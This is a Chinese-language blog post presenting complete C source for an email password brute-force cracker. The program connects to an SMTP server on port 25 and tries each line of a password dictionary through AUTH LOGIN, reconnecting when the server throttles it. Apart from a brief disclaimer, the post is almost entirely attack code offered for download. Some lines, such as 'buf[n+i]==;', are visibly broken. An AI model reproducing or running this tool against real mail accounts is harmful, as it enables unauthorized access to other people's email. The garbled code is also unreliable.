当前位置: 主页 > 日志 > 原创程序 >

SMTP-E-mail密码暴力破解

原理:使用了SMTP验证检测
觉得效果不是太理想,过段时间,我再换成POP3验证检测试试,应该效果比这个好
还是那句话,别用来干坏事呀,我可不负责任。
按照惯例,先给个截图:




//E-mail密码暴力破解-SMTP
//By RedIce
//E-mail:redice@see.xidian.edu.cn
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib") 
char*  ch64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 
FILE *FileOpr;    
SOCKET sender;
unsigned char *encode(unsigned char *,int);//函数声明;Base64编码
char send_wait(char *,char *,char);//函数声明:发送数据并等待接收到响应码
void usage();//程序使用说明
void initialsocket();//重置Socket连接
struct sockaddr_in dest;//目的地址结构体
void main(int argc,char *argv[])
{
    char temp[1024]; //读取密码字典缓冲区
    int k=0,i=0;//已读取密码文件行数
    DWORD starttime;//程序运行开始时间
    WSADATA wsa;//WSAData结构体
    PHOSTENT hostinfo;//主机信息(域名->IP)
    char passfile[201];//密码字典文件路径
    char username[51];//用户名
    char *ICMP_DEST_IP;//目的IP
    char ret;//返回值
    memset(passfile,0,201);//密码字典文件路径
    memset(username,0,51);//欲破解的用户名
    if(1==argc)//如果只有默认的命令行参数 则给出程序说明 并退出程序
    {
        usage();
        return;
    }
    else//如果有多个参数
    {
        for(i=1;i<=argc-1;i++)
        {
            if(strstr(argv[i],"-f"))
            {
               if(strlen(argv[i+1])>=200)
               {
                   printf("密码字典文件名太长! ");
                   return;
               }
               strcpy(passfile,argv[i+1]);
               i++;
            }
            if(strstr(argv[i],"-u"))
            {
                if(strlen(argv[i+1])>=50)
                {
                    printf("用户名名太长! ");
                    return;
                }
                strcpy(username,argv[i+1]);
                i++;
            }
            if(strstr(argv[i],"-?"))
            {
                usage();
                return;
            }
        }
    }
    if(strlen(username)==0||strlen(passfile)==0)
    {
        printf("请指定用户名称和密码字典路径! ");
        usage();
        return;
    }
    ICMP_DEST_IP=argv[argc-1];//取得域名(IP)
    if(WSAStartup(MAKEWORD(2,2),&wsa))
    {
        printf("套接字版本协商出错! ");
        WSACleanup();
        return;
    }
    //域名解析
    hostinfo=gethostbyname(ICMP_DEST_IP); //参数为需要解析的主机名
    if(NULL==hostinfo)
    {
        printf("无法解析主机%s的IP地址!",ICMP_DEST_IP);
        WSACleanup();
        return;
    }
    else
    {
        ICMP_DEST_IP=inet_ntoa(*(struct in_addr*)*hostinfo->h_addr_list);
    }
    //填充目的地址结构体
    memset(&dest,0,sizeof(dest));
    dest.sin_family=AF_INET;
    dest.sin_addr.S_un.S_addr=inet_addr(ICMP_DEST_IP);
    dest.sin_port=htons(25);//SMTP默认为25
    FileOpr=fopen(passfile,"r");
    if(NULL==FileOpr)
    {
        printf("打开文件失败,请检查输入的文件路径是否正确! ");
        WSACleanup();
        return;
    }
    initialsocket();//初始化Socket
    starttime=GetTickCount(); 
    while(1)
    {
        memset(temp,0,100);
          if(NULL==fgets(temp,100,FileOpr)) //读取密码文件
            break;
        else
        {
            if(temp[strlen(temp)-1]==0x0A)
               temp[strlen(temp)-1]=0;
            printf("已尝试过%d个密码...%s ",++k,temp);
            //发送AUTH LOGIN命令,并起到接收响应码334
            if(send_wait("AUTH LOGIN","334",0)!=2) continue;
            //发送经过Base64加密过的用户名,并期待接收响应码334
            if(send_wait(username,"334",1)!=2) continue;
            //发送经过Base64加密过的密码,并期待接收响应码235
            if(2!=send_wait(temp,"235",1)) 
                continue;
            else
            {
                printf("Password:%s ",temp);
                break;
            }
        }
        Sleep(200);
    }
    printf("程序运行耗时:%ds,%dms ",(GetTickCount()-starttime)/1000,(GetTickCount()-starttime) % 1000);
    fclose(FileOpr);
    closesocket(sender);
    WSACleanup();
    return;
}
//发送数据并等待接收到响应码
//参数:发送的请求;发送数据是否进行Base64编码(1表示加密)
//返回值:-1发送失败,0接收数据出错,1没有成功接收到响应码,2成功接收到响应码
char send_wait(char * command,char * responsecode,char isencode)
{
    unsigned char *base64;
    char smtp_data[101];//提交给SMTP服务器的数据
    char recvbuf[201];//接收缓冲区
    DWORD starttime;//开始时间
    memset(smtp_data,0,101);//将发送缓冲区填零
    if(isencode)//如果需要Base64编码
    {
        base64=encode(command,strlen(command));
        memcpy(smtp_data,base64,_msize(base64)-1);
        smtp_data[strlen(smtp_data)-1]==;
    }
    else
    {
        strcpy(smtp_data,command);
    }
    smtp_data[strlen(smtp_data)]=0x0D;//在命令末尾加上换行符
    smtp_data[strlen(smtp_data)]=0x0A;
    if(SOCKET_ERROR==send(sender,smtp_data,strlen(smtp_data),0))      
    {
        printf("发送请求出错! ");
        return -1;
    }
    memset(recvbuf,0,201);//将接收缓冲区填零
    starttime=GetTickCount(); 
    while(1)
    {
        if(GetTickCount()-starttime>=2000) return 0;
        if(SOCKET_ERROR ==recv(sender,recvbuf,200,0))
        {
            printf("接收信息出错! ");
            return 0;
        }
        else
        {
            //printf("smtp server:%s ",recvbuf);
            if(NULL==strstr(recvbuf,responsecode)) 
            {
                if(strstr(recvbuf,"421")||strstr(recvbuf,"451"))
                    initialsocket(); //重置Socket连接
                return 1;
            }
            else //成功收到响应码responsecode
               return 2;
        }
    }
}
//Base64编码
unsigned char *encode(unsigned char *src,int srclen)
{
    int n,buflen,i,j;
    int pading=0;
    unsigned char *buf;
    static unsigned char *dst; 
    buf=src;
    buflen=n=srclen;
    if(n%3!=0)  /* pad with = by using a temp buffer */
    {
         pading=1;
         buflen=n+3-n%3;
         buf=malloc(buflen+1);
         memset(buf,0,buflen+1);
         memcpy(buf,src,n);
           for(i=0;i<3-n%3;i++)
            buf[n+i]==;
    }
    dst=malloc(buflen*4/3+1);
    memset(dst,0,buflen*4/3+1);
    for(i=0,j=0;i<buflen;i+=3,j+=4)
    {
         dst[j]=(buf[i]&0xFC)>>2;
         dst[j+1]=((buf[i]&0x03)<<4) + ((buf[i+1]&0xF0)>>4);
         dst[j+2]=((buf[i+1]&0x0F)<<2) + ((buf[i+2]&0xC0)>>6);
         dst[j+3]=buf[i+2]&0x3F; 
    }
    for(i=0;i<buflen*4/3;i++) /* map 6 bit value to base64 ASCII character */
         dst[i]=ch64[dst[i]];
    if(pading)
     free(buf);
    return dst;
}
//程序使用说明
void usage()
{
    printf("E-mail密码暴力破解工具 ");
    printf("By RedIce ");
    printf("E-mail:redice@see.xidian.edu.cn ");
    printf("http:\\redice.1.suhai.com.cn ");
    printf("注意:国内部分SMTP服务器有防暴力破解设置(eg. smtp.126.com) ");
    printf("Usage: emailcracker.exe  -f 密码字典路径 SMTP服务器(域名/IP地址) ");
    printf("Options: ");
    printf("        -u 指定要破解的帐户名称 ");
    printf("        -f 指定密码字典路径(必须是完整路径) ");
    printf("        -? 显示该帮助信息 ");
}

void initialsocket()
{
    char recvbuf[201];//接收服务器返回数据缓冲区
    int timeout=3000;//接收超时时间
    closesocket(sender);
    sender=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(INVALID_SOCKET==sender) 
        {
            printf("创建套接字出错! ");
            WSACleanup();
            exit(0);
        }
    if(SOCKET_ERROR==connect(sender,(SOCKADDR *) &dest,sizeof(dest)))    
        {
            printf("连接目的主机失败! ");
            closesocket(sender);
            WSACleanup();
            exit(0);
        }
        //设置接收超时
        if(SOCKET_ERROR ==setsockopt(sender,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout)))
        {
            printf("设置套接字超时失败! ");
            closesocket(sender);
            WSACleanup();
            exit(0);
        }
        memset(recvbuf,0,201);
        if(SOCKET_ERROR ==recv(sender,recvbuf,200,0))
        {
            printf("接收连接信息出错! ");
            closesocket(sender);
            WSACleanup();
            exit(0);
        }
        else
        {
            if(strstr(recvbuf,"554"))
            {
                printf("该SMTP服务器有防暴力破解设置,你的IP地址被临时禁止连接,请稍候再试... ");
                printf("from Smtp Server: %s ",recvbuf);
                closesocket(sender);
                WSACleanup();
                exit(0);//退出程序
            }
        }
        //发送"EHLO 126.com"命令,并期待接收响应码250
        send_wait("EHLO 126.com","250",0);
}


附源代码:

File: Click to Download

[日志信息]

该日志于 2009-02-26 12:50 由 redice 发表在 redice's Blog ,你除了可以发表评论外,还可以转载 “SMTP-E-mail密码暴力破解” 日志到你的网站或博客,但是请保留源地址及作者信息,谢谢!!    (尊重他人劳动,你我共同努力)
   
验证(必填):   点击我更换验证码

redice's Blog  is powered by DedeCms |  Theme by Monkeii.Lee |  网站地图 |  本服务器由西安鲲之鹏网络信息技术有限公司友情提供

返回顶部